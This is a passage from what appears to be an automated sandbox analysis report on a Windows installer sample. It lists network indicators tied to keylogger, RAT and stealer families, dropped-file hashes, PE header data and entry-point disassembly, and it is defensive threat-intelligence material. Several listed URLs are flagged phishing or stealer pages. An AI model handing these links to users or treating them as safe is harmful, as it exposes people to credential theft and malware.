                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ORACLE-BMC-31898UShZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      CLOUDFLARENETUSFUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 104.16.184.241
                                                                                      http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      348426869538810128.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                      • 162.159.61.3
                                                                                      statement.docGet hashmaliciousKnowBe4Browse
                                                                                      • 104.17.245.203
                                                                                      http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.245.203
                                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 172.67.74.152
                                                                                      https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                      • 188.114.96.3
                                                                                      9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.112.1
                                                                                      Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      TELEGRAMRUFUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      UTMEMUS19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9adhZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.48.1
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eFUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e19https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                      • 142.250.184.193
                                                                                      • 142.250.184.206
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dllDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousUnknownBrowse
                                                                                          KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                  Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                    NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):484658
                                                                                                          Entropy (8bit):7.809711763657168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                          MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                          SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                          SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                          SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):302802
                                                                                                          Entropy (8bit):7.715597307255138
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:1TAGwcHt8IYejp9JRL5ljyLlQRCuLyon4mwYEmrwAd:1TAGFkejpRLPelKdeaREGwq
                                                                                                          MD5:D59A83F9C3B0814E7F07E0350AE015DA
                                                                                                          SHA1:8D8EAC7CE54E23E12805064E25E8E2B09ABF5A4E
                                                                                                          SHA-256:D3D32567E0FD98C5A1695A1CCBBF0144C7F083D1739BED777B6868B68F8CF7EB
                                                                                                          SHA-512:87389F16386E0F2919F6F4A86D12A92E6DFD94C2FC977019E1F1EB3385BBE762D4CA34EBE08DA6D73A1CFD5F1D778073E58A063C4213FD18CF8C6A8B0204E3A4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.......***..............................;;........:..................:.......QQ............v..........'.......(...................(......{....w...................''''............................dd.ww...................[....hhh...)...vv........................HH.TT.RR....MM.8................................................+++................44.f.-.;;;.........(.HH.T............oooo.........................g.;...)))...?.....(((........................................]...........v................rr......rr..............\.fff........aa.00.Z.Q....................&.........................}}}}}}.......--......................""".............777...........O.......... .55........................................;.III.'......33........................B...............&.................\.$$.EEE..%......I........yy......................P...|||........2...............H..........XX................a...WW............CC............i.L......bb........,..T...:.M...............................ii...........
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):112291
                                                                                                          Entropy (8bit):1.249420131631438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                          MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                          SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                          SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                          SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):362089
                                                                                                          Entropy (8bit):1.23992084267325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                          MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                          SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                          SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                          SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66838
                                                                                                          Entropy (8bit):4.601980718534523
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:d8Z4bSnvTwDC0ik3K/pdZ3dGsHohAGSxH2Qi:le8C7F3hHohAJR2Qi
                                                                                                          MD5:C0DBD375347024F0842ECF32EFC20A39
                                                                                                          SHA1:0B005481213478B486758E53EBFA1448FF7B4C32
                                                                                                          SHA-256:83E255BFBC1D9529AA12515F0AFA172EE5959DE7619CEEC74C2B7AB232E2F1A9
                                                                                                          SHA-512:113B542FF537405DD98F7E711E8B16B18F2E32F3E781E51DE98697A6CB08145237B7EE553220FD4F9562556B8E05FE23BD4744063AB1CA72EE207144DAFEE63E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..............,.Z.............................ttt.......&................`...............e......k.........2.....FFF.GG.?????.k....;...................u.xx....###....h...\.).................BB...........O.o...3.P.....L...................N...............r..""..............66.^.......3.(((........................66.ffff....................G.K....#..........6.....z.....^......pp........@@...............''..K...w.??....................3..xxxxx.............}.......bb............fff........ZZZZZ................^..........55.H..........w.....,....R...............\\\.ii.*...........yy.......d..>>>.........y.......2...^..........[...RRRRR............................n......!!.2...............................V......a........................DD....''''....................77........................YYYYYYYYYY....................9.................L.......!!....................CC..YYY..............s..'.....M............E. .......................}...........................EE..l.................h....HH
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139354
                                                                                                          Entropy (8bit):1.2473328695625903
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                          MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                          SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                          SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                          SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                          Malicious:false
                                                                                                          Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1494171
                                                                                                          Entropy (8bit):5.529984636265362
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:y+lFkOHecco3xX3y4bz2lWwWo6rSTZyqZX:RyoBXbz2luo6rS1yqZ
                                                                                                          MD5:09C061859A1E2418D61BD43E8FA8F63A
                                                                                                          SHA1:94CA39EE23956A64D10CBDA2A7806ECB0840C5C7
                                                                                                          SHA-256:D5A1FCC23605E0815EAE68180CB374A80B2385DB0E7430D97FACE2630689A8AB
                                                                                                          SHA-512:E405F684617AA34C4BB04C186988893C211BF89FF5C7D4F5A77BE5CF5D0BAC9F66BD9404969CE711A90C8AEDD3E8C08D386D128A78FB188E551D2AB97CB05BF2
                                                                                                          Malicious:false
                                                                                                          Preview:.5......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...........r...h...............................................................g...............................................................j...............................................................................................................................{.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):5.719859767584478
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                          MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                          SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                          SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                          SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: KO0q4biYfC.exe, Detection: malicious, Browse
                                                                                                          • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                          • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                          • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                          • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                          • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                          • Filename: Awb 4586109146.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: PO 0309494059506060609696007.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.960048713088303
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:ajRZflJ2ch.exe
                                                                                                          File size:1'026'527 bytes
                                                                                                          MD5:c9775580271050109b3431a54f1880f0
                                                                                                          SHA1:85d69a1abf2b6c4ab9a4fa77c27c5f43e7302630
                                                                                                          SHA256:1d703dda4c786c51432a22da942b92244544a00c1d81b937bd5e5424947804f8
                                                                                                          SHA512:412670d7d1ad7fb2d292019c4efc99912b655ff54917972504be0d0855a5d7845e7ba417393d3114ddcdc9a44ba5f6240f8183e180f61326be8c7b7cf5d5bca1
                                                                                                          SSDEEP:12288:9jwjW11WewcTe8agur7Ew6+Cihk6QM3urjWslPFJgz7oo2EPAAL3Y+97xC+9Wf7c:9jwKCN8VKPkzltJ87oop7L3Vb20oFc3
                                                                                                          TLSH:C92523012BE3C9EEE1D2817175C2E3B666F99C11441AED2F47042E5F7D3A8A85436ACF
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                          Icon Hash:46224e4c19391d03
                                                                                                          Entrypoint:0x4034a5
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000020h
                                                                                                          pop edi
                                                                                                          xor ebx, ebx
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+14h], ebx
                                                                                                          mov dword ptr [esp+10h], 0040A230h
                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                          call dword ptr [004080ACh]
                                                                                                          call dword ptr [004080A8h]
                                                                                                          and eax, BFFFFFFFh
                                                                                                          cmp ax, 00000006h
                                                                                                          mov dword ptr [0042A24Ch], eax
                                                                                                          je 00007FEE2CACEA43h
                                                                                                          push ebx
                                                                                                          call 00007FEE2CAD1D0Dh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007FEE2CACEA39h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          mov esi, 004082B0h
                                                                                                          push esi
                                                                                                          call 00007FEE2CAD1C87h
                                                                                                          push esi
                                                                                                          call dword ptr [00408150h]
                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                          cmp byte ptr [esi], 00000000h
                                                                                                          jne 00007FEE2CACEA1Ch
                                                                                                          push 0000000Ah
                                                                                                          call 00007FEE2CAD1CE0h
                                                                                                          push 00000008h
                                                                                                          call 00007FEE2CAD1CD9h
                                                                                                          push 00000006h
                                                                                                          mov dword ptr [0042A244h], eax
                                                                                                          call 00007FEE2CAD1CCDh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007FEE2CACEA41h
                                                                                                          push 0000001Eh
                                                                                                          call eax
                                                                                                          test eax, eax
                                                                                                          je 00007FEE2CACEA39h
                                                                                                          or byte ptr [0042A24Fh], 00000040h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebx
                                                                                                          call dword ptr [004082A0h]
                                                                                                          mov dword ptr [0042A318h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 004216E8h
                                                                                                          call dword ptr [00408188h]
                                                                                                          push 0040A384h
                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
